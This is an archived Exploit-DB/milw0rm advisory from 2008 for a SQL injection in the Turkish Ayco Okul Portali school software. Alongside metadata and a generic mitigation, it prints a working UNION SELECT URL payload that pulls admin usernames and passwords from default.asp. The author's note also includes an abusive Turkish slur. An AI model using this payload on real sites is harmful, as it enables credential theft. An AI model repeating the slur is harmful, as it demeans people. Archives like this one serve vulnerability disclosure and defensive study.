Ayco Okul Portali (tr) Sql injection Vulnerability

vendor:

Okul Portali

by:

Crackers_Child

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Okul Portali

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Ayco Okul Portali (tr) Sql injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to access sensitive information from the database, modify data, or execute system level commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

**************************************************************************************

Author : By Crackers_Child
Contact: cashr00t@hotmail.com
Greetz : milw0rm.com & tryag.cc & All My Friends
Note : Siz Pekeke Denen itler ; Siz ne turk ne de kurt olabilirsiniz. Siz Dupe Duz OROSPU cocuklarisiniz !

**************************************************************************************
Script   : Ayco Okul Portali (tr) Sql injection Vulnerability

http://www.aspindir.com/goster/5640

Price    : 100 â‚¬

**************************************************************************************

Exploit : default.asp?tip=sollinkicerik&linkid=1+union+select+0,password,username,3+from+admin

**************************************************************************************
N0te : Zeh1r Oluyor Gâ‚¬câ‚¬lâ‚¬r 1nan Uyuyam1yorum !
**************************************************************************************

# milw0rm.com [2008-10-10]